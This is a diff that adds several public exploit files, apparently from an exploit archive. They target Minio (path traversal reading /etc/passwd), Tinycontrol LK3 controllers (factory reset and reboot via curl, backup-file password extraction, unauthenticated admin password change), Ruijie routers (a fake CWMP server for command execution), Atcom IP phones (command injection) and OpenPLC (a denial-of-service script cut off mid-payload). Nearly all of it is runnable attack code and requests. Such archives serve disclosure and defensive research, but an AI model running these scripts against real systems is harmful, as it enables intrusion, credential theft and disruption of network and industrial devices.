diff --git a/exploits/go/webapps/51734.py b/exploits/go/webapps/51734.py new file mode 100755 index 000000000..b8c8bbc7f --- /dev/null +++ b/exploits/go/webapps/51734.py @@ -0,0 +1,81 @@ +# Exploit Title: Minio 2022-07-29T19-40-48Z - Path traversal +# Date: 2023-09-02 +# Exploit Author: Jenson Zhao +# Vendor Homepage: https://min.io/ +# Software Link: https://github.com/minio/minio/ +# Version: Up to (excluding) 2022-07-29T19-40-48Z +# Tested on: Windows 10 +# CVE : CVE-2022-35919 +# Required before execution: pip install minio,requests +import urllib.parse +import requests, json, re, datetime, argparse +from minio.credentials import Credentials +from minio.signer import sign_v4_s3 + + +class MyMinio(): + secure = False + + def __init__(self, base_url, access_key, secret_key): + self.credits = Credentials( + access_key=access_key, + secret_key=secret_key + ) + if base_url.startswith('http://') and base_url.endswith('/'): + self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' + elif base_url.startswith('https://') and base_url.endswith('/'): + self.url = base_url + 'minio/admin/v3/update?updateURL=%2Fetc%2Fpasswd' + self.secure = True + else: + print('Please enter a URL address that starts with "http://" or "https://" and ends with "/"\n') + + def poc(self): + datetimes = datetime.datetime.utcnow() + datetime_str = datetimes.strftime('%Y%m%dT%H%M%SZ') + urls = urllib.parse.urlparse(self.url) + headers = { + 'X-Amz-Content-Sha256': 'e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', + 'X-Amz-Date': datetime_str, + 'Host': urls.netloc, + } + headers = sign_v4_s3( + method='POST', + url=urls, + region='', + headers=headers, + credentials=self.credits, + content_sha256='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', + date=datetimes, + ) + if self.secure: + response = requests.post(url=self.url, headers=headers, verify=False) + else: + response = requests.post(url=self.url, headers=headers) + try: + message = json.loads(response.text)['Message'] + pattern = r'(\w+):(\w+):(\d+):(\d+):(\w+):(\/[\w\/\.-]+):(\/[\w\/\.-]+)' + matches = re.findall(pattern, message) + if matches: + print('There is CVE-2022-35919 problem with the url!') + print('The contents of the /etc/passwd file are as follows:') + for match in matches: + print("{}:{}:{}:{}:{}:{}:{}".format(match[0], match[1], match[2], match[3], match[4], match[5], + match[6])) + else: + print('There is no CVE-2022-35919 problem with the url!') + print('Here is the response message content:') + print(message) + except Exception as e: + print( + 'It seems there was an issue with the requested response, which did not meet our expected criteria. Here is the response content:') + print(response.text) + + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument("-u", "--url", required=True, help="URL of the target. example: http://192.168.1.1:9088/") + parser.add_argument("-a", "--accesskey", required=True, help="Minio AccessKey of the target. example: minioadmin") + parser.add_argument("-s", "--secretkey", required=True, help="Minio SecretKey of the target. example: minioadmin") + args = parser.parse_args() + minio = MyMinio(args.url, args.accesskey, args.secretkey) + minio.poc() \ No newline at end of file diff --git a/exploits/hardware/dos/51730.txt b/exploits/hardware/dos/51730.txt new file mode 100644 index 000000000..6dd68d3f0 --- /dev/null +++ b/exploits/hardware/dos/51730.txt @@ -0,0 +1,47 @@ +Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Denial Of Service +Exploit Author: LiquidWorm + +Vendor: Tinycontrol +Product web page: https://www.tinycontrol.pl +Affected version: <=1.58a, HW 3.8 + +Summary: Lan Controller is a very universal +device that allows you to connect many different +sensors and remotely view their readings and +remotely control various types of outputs. +It is also possible to combine both functions +into an automatic if -> this with a calendar +when -> then. The device provides a user interface +in the form of a web page. The website presents +readings of various types of sensors: temperature, +humidity, pressure, voltage, current. It also +allows you to configure the device, incl. event +setting and controlling up to 10 outputs. Thanks +to the support of many protocols, it is possible +to operate from smartphones, collect and observ +the results on the server, as well as cooperation +with other I/O systems based on TCP/IP and Modbus. + +Desc: The controller suffers from an unauthenticated +remote denial of service vulnerability. An attacker +can issue direct requests to the stm.cgi page to +reboot and also reset factory settings on the device. + +Tested on: lwIP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5785 +Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5785.php + + +18.08.2023 + +-- + + +$ curl http://192.168.1.1:8082/stm.cgi?eeprom_reset=1 # restore default settings +$ curl http://192.168.1.1:8082/stm.cgi?lk3restart=1 # reboot controller \ No newline at end of file diff --git a/exploits/hardware/remote/51727.txt b/exploits/hardware/remote/51727.txt new file mode 100644 index 000000000..e705ee23c --- /dev/null +++ b/exploits/hardware/remote/51727.txt @@ -0,0 +1,176 @@ +# Exploit Title: Ruijie Reyee Wireless Router firmware version B11P204 - MITM Remote Code Execution (RCE) +# Date: April 15, 2023 +# Exploit Author: Mochammad Riyan Firmansyah of SecLab Indonesia +# Vendor Homepage: https://ruijienetworks.com +# Software Link: https://www.ruijienetworks.com/support/documents/slide_EW1200G-PRO-Firmware-B11P204 +# Version: ReyeeOS 1.204.1614; EW_3.0(1)B11P204, Release(10161400) +# Tested on: Ruijie RG-EW1200, Ruijie RG-EW1200G PRO + +""" +Summary +======= +The Ruijie Reyee Cloud Web Controller allows the user to use a diagnostic tool which includes a ping check to ensure connection to the intended network, but the ip address input form is not validated properly and allows the user to perform OS command injection. +In other side, Ruijie Reyee Cloud based Device will make polling request to Ruijie Reyee CWMP server to ask if there's any command from web controller need to be executed. After analyze the network capture that come from the device, the connection for pooling request to Ruijie Reyee CWMP server is unencrypted HTTP request. +Because of unencrypted HTTP request that come from Ruijie Reyee Cloud based Device, attacker could make fake server using Man-in-The-Middle (MiTM) attack and send arbitrary commands to execute on the cloud based device that make CWMP request to fake server. +Once the attacker have gained access, they can execute arbitrary commands on the system or application, potentially compromising sensitive data, installing malware, or taking control of the system. + +This advisory has also been published at https://github.com/ruzfi/advisory/tree/main/ruijie-wireless-router-mitm-rce. +""" + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- +from html import escape, unescape +import http.server +import socketserver +import io +import time +import re +import argparse +import gzip + +# command payload +command = "uname -a" + +# change this to serve on a different port +PORT = 8080 + +def cwmp_inform(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + product_class = re.search(r"(?:)(.*?)(?:<\/ProductClass>)", soap).group(1) + serial_number = re.search(r"(?:)(.*?)(?:<\/SerialNumber>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'product_class': product_class, 'serial_number': serial_number, 'parameters': {}} + parameters = re.findall(r"(?:

)(.*?)(?:<\/P>)", soap) + for parameter in parameters: + parameter_name = re.search(r"(?:)(.*?)(?:<\/N>)", parameter).group(1) + parameter_value = re.search(r"(?:)(.*?)(?:<\/V>)", parameter).group(1) + result['parameters'][parameter_name] = parameter_value + return result + +def cwmp_inform_response(): + return """ +1611""" + +def command_payload(command): + current_time = time.time() + result = """ +ID:intrnl.unset.id.X_RUIJIE_COM_CN_ExecuteCliCommand{cur_time}1config{command}""".format(cur_time=current_time, command=command) + return result + +def command_response(soap): + cwmp_id = re.search(r"(?:)(.*?)(?:<\/cwmp:ID>)", soap).group(1) + command = re.search(r"(?:)(.*?)(?:<\/Command>)", soap).group(1) + response = re.search(r"(?:)((\n|.)*?)(?:<\/Response>)", soap).group(1) + result = {'cwmp_id': cwmp_id, 'command': command, 'response': response} + return result + +class CustomHTTPRequestHandler(http.server.SimpleHTTPRequestHandler): + protocol_version = 'HTTP/1.1' + def do_GET(self): + self.send_response(204) + self.end_headers() + + def do_POST(self): + print("[*] Got hit by", self.client_address) + + f = io.BytesIO() + if 'service' in self.path: + stage, info = self.parse_stage() + if stage == "cwmp_inform": + self.send_response(200) + print("[!] Got Device information", self.client_address) + print("[*] Product Class:", info['product_class']) + print("[*] Serial Number:", info['serial_number']) + print("[*] MAC Address:", info['parameters']['mac']) + print("[*] STUN Client IP:", info['parameters']['stunclientip']) + payload = bytes(cwmp_inform_response(), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + elif stage == "command_request": + self.send_response(200) + self.send_header("Set-Cookie", "JSESSIONID=6563DF85A6C6828915385C5CDCF4B5F5; Path=/service; HttpOnly") + print("[*] Device interacting", self.client_address) + print(info) + payload = bytes(command_payload(escape("ping -c 4 127.0.0.1 && {}".format(command))), 'utf-8') + f.write(payload) + self.send_header("Content-Length", str(f.tell())) + else: + print("[*] Command response", self.client_address) + print(unescape(info['response'])) + self.send_response(204) + f.write(b"") + else: + print("[x] Received invalid request", self.client_address) + self.send_response(204) + f.write(b"") + + f.seek(0) + self.send_header("Connection", "keep-alive") + self.send_header("Content-type", "text/xml;charset=utf-8") + self.end_headers() + if f: + self.copyfile(f, self.wfile) + f.close() + + def parse_stage(self): + content_length = int(self.headers['Content-Length']) + post_data = gzip.decompress(self.rfile.read(content_length)) + if "cwmp:Inform" in post_data.decode("utf-8"): + return ("cwmp_inform", cwmp_inform(post_data.decode("utf-8"))) + elif "cwmp:X_RUIJIE_COM_CN_ExecuteCliCommandResponse" in post_data.decode("utf-8"): + return ("command_response", command_response(post_data.decode("utf-8"))) + else: + return ("command_request", "Ping!") + + def log_message(self, format, *args): + return + +if __name__ == '__main__': + parser = argparse.ArgumentParser() + parser.add_argument('--bind', '-b', default='', metavar='ADDRESS', + help='Specify alternate bind address ' + '[default: all interfaces]') + parser.add_argument('port', action='store', + default=PORT, type=int, + nargs='?', + help='Specify alternate port [default: {}]'.format(PORT)) + args = parser.parse_args() + + Handler = CustomHTTPRequestHandler + with socketserver.TCPServer((args.bind, args.port), Handler) as httpd: + ip_addr = args.bind if args.bind != '' else '0.0.0.0' + print("[!] serving fake CWMP server at {}:{}".format(ip_addr, args.port)) + try: + httpd.serve_forever() + except KeyboardInterrupt: + pass + httpd.server_close() + + +""" +Output +====== +ubuntu:~$ python3 exploit.py +[!] serving fake CWMP server at 0.0.0.0:8080 +[*] Got hit by ('[redacted]', [redacted]) +[!] Got Device information ('[redacted]', [redacted]) +[*] Product Class: EW1200G-PRO +[*] Serial Number: [redacted] +[*] MAC Address: [redacted] +[*] STUN Client IP: [redacted]:[redacted] +[*] Got hit by ('[redacted]', [redacted]) +[*] Device interacting ('[redacted]', [redacted]) +Ping! +[*] Got hit by ('[redacted]', [redacted]) +[*] Command response ('[redacted]', [redacted]) +PING 127.0.0.1 (127.0.0.1): 56 data bytes +64 bytes from 127.0.0.1: seq=0 ttl=64 time=0.400 ms +64 bytes from 127.0.0.1: seq=1 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=2 ttl=64 time=0.320 ms +64 bytes from 127.0.0.1: seq=3 ttl=64 time=0.300 ms + +--- 127.0.0.1 ping statistics --- +4 packets transmitted, 4 packets received, 0% packet loss +round-trip min/avg/max = 0.300/0.335/0.400 ms +Linux Ruijie 3.10.108 #1 SMP Fri Apr 14 00:39:29 UTC 2023 mips GNU/Linux + +""" \ No newline at end of file diff --git a/exploits/hardware/remote/51731.py b/exploits/hardware/remote/51731.py new file mode 100755 index 000000000..23b6c1055 --- /dev/null +++ b/exploits/hardware/remote/51731.py @@ -0,0 +1,117 @@ +#!/usr/bin/env python +# +#Exploit Title: Tinycontrol LAN Controller v3 (LK3) - Remote Credentials Extraction +# Exploit Author: LiquidWorm +# +# Vendor: Tinycontrol +# Product web page: https://www.tinycontrol.pl +# Affected version: <=1.58a, HW 3.8 +# +# Summary: Lan Controller is a very universal +# device that allows you to connect many different +# sensors and remotely view their readings and +# remotely control various types of outputs. +# It is also possible to combine both functions +# into an automatic if -> this with a calendar +# when -> then. The device provides a user interface +# in the form of a web page. The website presents +# readings of various types of sensors: temperature, +# humidity, pressure, voltage, current. It also +# allows you to configure the device, incl. event +# setting and controlling up to 10 outputs. Thanks +# to the support of many protocols, it is possible +# to operate from smartphones, collect and observ +# the results on the server, as well as cooperation +# with other I/O systems based on TCP/IP and Modbus. +# +# Desc: An unauthenticated attacker can retrieve the +# controller's configuration backup file and extract +# sensitive information that can allow him/her/them +# to bypass security controls and penetrate the system +# in its entirety. +# +# Tested on: lwIP +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# @zeroscience +# +# +# Advisory ID: ZSL-2023-5786 +# Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5786.php +# +# +# 18.08.2023 +# +# + + +import subprocess +import requests +import base64 +import sys + +binb = "lk3_settings.bin" +outf = "lk3_settings.enc" +bpatt = "0upassword" +epatt = "pool.ntp.org" +startf = False +endf = False +extral = [] + +print(""" + O`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'O + | | + | Tinycontrol LK3 1.58 Settings DL | + | ZSL-2023-5786 | + | 2023 (c) Zero Science Lab | + | | + |`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'`'| + | | +""") + +if len(sys.argv) != 2: + print("[?] Vaka: python {} ipaddr:port".format(sys.argv[0])) + exit(-0) +else: + rhost=sys.argv[1] + if not "http" in rhost: + rhost="http://{}".format(rhost) + +try: + resp = requests.get(rhost + "/" + binb) + if resp.status_code == 200: + with open(outf, 'wb') as f: + f.write(resp.content) + print(f"[*] Got data as {outf}") + else: + print(f"[!] Backup failed. Status code: {resp.status_code}") +except Exception as e: + print("[!] Error:", str(e)) + exit(-1) + +binf = outf +sout = subprocess.check_output(["strings", binf], universal_newlines = True) +linea = sout.split("\n") + +for thricer in linea: + if bpatt in thricer: + startf = True + elif epatt in thricer: + endf = True + elif startf and not endf: + extral.append(thricer) + +if len(extral) >= 4: + userl = extral[1].strip() + adminl = extral[3].strip() + try: + decuser = base64.b64decode(userl).decode("utf-8") + decadmin = base64.b64decode(adminl).decode("utf-8") + print("[+] User password:", decuser) + print("[+] Admin password:", decadmin) + except Exception as e: + print("[!] Error decoding:", str(e)) +else: + print("[!] Regex failed.") + exit(-2) \ No newline at end of file diff --git a/exploits/hardware/remote/51732.txt b/exploits/hardware/remote/51732.txt new file mode 100644 index 000000000..f9f565650 --- /dev/null +++ b/exploits/hardware/remote/51732.txt @@ -0,0 +1,62 @@ +#!/bin/bash +: " +Exploit Title: Tinycontrol LAN Controller v3 (LK3) 1.58a - Remote Admin Password Change +Exploit Author: LiquidWorm + +Vendor: Tinycontrol +Product web page: https://www.tinycontrol.pl +Affected version: <=1.58a, HW 3.8 + +Summary: Lan Controller is a very universal +device that allows you to connect many different +sensors and remotely view their readings and +remotely control various types of outputs. +It is also possible to combine both functions +into an automatic if -> this with a calendar +when -> then. The device provides a user interface +in the form of a web page. The website presents +readings of various types of sensors: temperature, +humidity, pressure, voltage, current. It also +allows you to configure the device, incl. event +setting and controlling up to 10 outputs. Thanks +to the support of many protocols, it is possible +to operate from smartphones, collect and observ +the results on the server, as well as cooperation +with other I/O systems based on TCP/IP and Modbus. + +Desc: The application suffers from an insecure access +control allowing an unauthenticated attacker to +change accounts passwords and bypass authentication +gaining panel control access. + +Tested on: lwIP + + +Vulnerability discovered by Gjoko 'LiquidWorm' Krstic + @zeroscience + + +Advisory ID: ZSL-2023-5787 +Advisory ID: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5787.php + + +18.08.2023 + +" + +set -euo pipefail +IFS=$'\n\t' + +if [ $# -ne 2 ]; then + echo -ne '\nUsage: $0 [ipaddr] [desired admin pwd]\n\n' + exit +fi + +IP=$1 +PW=$2 + +EN=$(echo -n $PW | base64) + +curl -s http://$IP/stm.cgi?auth=00YWRtaW4=*$EN*dXNlcg==*dXNlcg== +# ?auth=00 (disable authentication, disable upgrade), https://docs.tinycontrol.pl/en/lk3/api/access/ +echo -ne '\nAdmin password changed to: '$PW \ No newline at end of file diff --git a/exploits/hardware/remote/51742.txt b/exploits/hardware/remote/51742.txt new file mode 100644 index 000000000..f1160bcc8 --- /dev/null +++ b/exploits/hardware/remote/51742.txt @@ -0,0 +1,36 @@ +# Exploit Title: Atcom 2.7.x.x - Authenticated Command Injection +# Google Dork: N/A +# Date: 07/09/2023 +# Exploit Author: Mohammed Adel +# Vendor Homepage: https://www.atcom.cn/ +# Software Link: +https://www.atcom.cn/html/yingwenban/Product/Fast_IP_phone/2017/1023/135.html +# Version: All versions above 2.7.x.x +# Tested on: Kali Linux + + +Exploit Request: + +POST /cgi-bin/web_cgi_main.cgi?user_get_phone_ping HTTP/1.1 +Host: {TARGET_IP} +User-Agent: polar +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 49 +Authorization: Digest username="admin", realm="IP Phone Web +Configuration", nonce="value_here", +uri="/cgi-bin/web_cgi_main.cgi?user_get_phone_ping", +response="value_here", qop=auth, nc=value_here, cnonce="value_here" + +cmd=0.0.0.0$(pwd)&ipv4_ipv6=0&user_get_phone_ping + + +Response: + +{"ping_cmd_result":"cGluZzogYmFkIGFkZHJlc3MgJzAuMC4wLjAvdXNyL2xvY2FsL2FwcC9saWdodHRwZC93d3cvY2dpLWJpbicK","ping_cmd":"0.0.0.0$(pwd)"} + +The value of "ping_cmd_result" is encoded as base64. Decoding the +value of "ping_cmd_result" reveals the result of the command executed +as shown below: + +ping: bad address '0.0.0.0/usr/local/app/lighttpd/www/cgi-bin' \ No newline at end of file diff --git a/exploits/multiple/dos/51746.txt b/exploits/multiple/dos/51746.txt new file mode 100644 index 000000000..059fe1ca7 --- /dev/null +++ b/exploits/multiple/dos/51746.txt @@ -0,0 +1,116 @@ +# Exploit Title: OpenPLC WebServer 3 - Denial of Service +# Date: 10.09.2023 +# Exploit Author: Kai Feng +# Vendor Homepage: https://autonomylogic.com/ +# Software Link: https://github.com/thiagoralves/OpenPLC_v3.git +# Version: Version 3 and 2 +# Tested on: Ubuntu 20.04 + + +import requests +import sys +import time +import optparse +import re + +parser = optparse.OptionParser() +parser.add_option('-u', '--url', action="store", dest="url", help="Base target uri (ex. http://target-uri:8080)") +parser.add_option('-l', '--user', action="store", dest="user", help="User credential to login") +parser.add_option('-p', '--passw', action="store", dest="passw", help="Pass credential to login") +parser.add_option('-i', '--rip', action="store", dest="rip", help="IP for Reverse Connection") +parser.add_option('-r', '--rport', action="store", dest="rport", help="Port for Reverse Connection") + +options, args = parser.parse_args() +if not options.url: + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + print('[+] Specify an url target') + print("[+] Example usage: exploit.py -u http://target-uri:8080 -l admin -p admin -i 192.168.1.54 -r 4444") + exit() + +host = options.url +login = options.url + '/login' +upload_program = options.url + '/programs' +compile_program = options.url + '/compile-program?file=681871.st' +run_plc_server = options.url + '/start_plc' +user = options.user +password = options.passw +rev_ip = options.rip +rev_port = options.rport +x = requests.Session() + +def auth(): + print('[+] Remote Code Execution on OpenPLC_v3 WebServer') + time.sleep(1) + print('[+] Checking if host '+host+' is Up...') + host_up = x.get(host) + try: + if host_up.status_code == 200: + print('[+] Host Up! ...') + except: + print('[+] This host seems to be down :( ') + sys.exit(0) + + print('[+] Trying to authenticate with credentials '+user+':'+password+'') + time.sleep(1) + submit = { + 'username': user, + 'password': password + } + x.post(login, data=submit) + response = x.get(upload_program) + + if len(response.text) > 30000 and response.status_code == 200: + print('[+] Login success!') + time.sleep(1) + else: + print('[x] Login failed :(') + sys.exit(0) + +def injection(): + print('[+] PLC program uploading... ') + upload_url = host + "/upload-program" + upload_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvgPw.qwEcF3rMliGcTgQ4zI4RInBZrqE"} + upload_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------210749863411176965311768214500", "Origin": host, "Connection": "close", "Referer": host + "/programs", "Upgrade-Insecure-Requests": "1"} + upload_data = "-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"file\"; filename=\"program.st\"\r\nContent-Type: application/vnd.sailingtracker.track\r\n\r\nPROGRAM prog0\n VAR\n var_in : BOOL;\n var_out : BOOL;\n END_VAR\n\n var_out := var_in;\nEND_PROGRAM\n\n\nCONFIGURATION Config0\n\n RESOURCE Res0 ON PLC\n TASK Main(INTERVAL := T#50ms,PRIORITY := 0);\n PROGRAM Inst0 WITH Main : prog0;\n END_RESOURCE\nEND_CONFIGURATION\n\r\n-----------------------------210749863411176965311768214500\r\nContent-Disposition: form-data; name=\"submit\"\r\n\r\nUpload Program\r\n-----------------------------210749863411176965311768214500--\r\n" + upload = x.post(upload_url, headers=upload_headers, cookies=upload_cookies, data=upload_data) + + act_url = host + "/upload-program-action" + act_headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------374516738927889180582770224000", "Origin": host, "Connection": "close", "Referer": host + "/upload-program", "Upgrade-Insecure-Requests": "1"} + act_data = "-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_name\"\r\n\r\nprogram.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_descr\"\r\n\r\n\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"prog_file\"\r\n\r\n681871.st\r\n-----------------------------374516738927889180582770224000\r\nContent-Disposition: form-data; name=\"epoch_time\"\r\n\r\n1617682656\r\n-----------------------------374516738927889180582770224000--\r\n" + upload_act = x.post(act_url, headers=act_headers, data=act_data) + time.sleep(2) + +def connection(): + print('[+] add device...') + inject_url = host + "/add-modbus-device" + # inject_dash = host + "/dashboard" + inject_cookies = {"session": ".eJw9z7FuwjAUheFXqTx3CE5YInVI5RQR6V4rlSPrekEFXIKJ0yiASi7i3Zt26HamT-e_i83n6M-tyC_j1T-LzXEv8rt42opcIEOCCtgFysiWKZgic-otkK2XLr53zhQTylpiOC2cKTPkYt7NDSMlJJtv4NcO1Zq1wQhMqbYk9YokMSWgDgnK6qRXVevsbPC-1bZqicsJw2F2YeksTWiqANwkNFsQXdSKUlB16gIskMsbhF9_9yIe8_fBj_Gj9_3lv-Z69uNfkvgafD90O_H4ARVeT-s.YGvyFA.2NQ7ZYcNZ74ci2miLkefHCai2Fk"} + inject_headers = {"User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/117.0", "Accept": "/text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------169043028319378579443281515639", "Origin": host, "Connection": "close", "Referer": host + "/add-modbus-device", "Upgrade-Insecure-Requests": "1"} + inject_data = "-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_name\"\r\n\r\n122222222222222222222222222222222222211111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_protocol\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_id\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_ip\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_port\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; name=\"device_baud\"\r\n\r\n#111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111\r\n-----------------------------169043028319378579443281515639\r\nContent-Disposition: form-data; 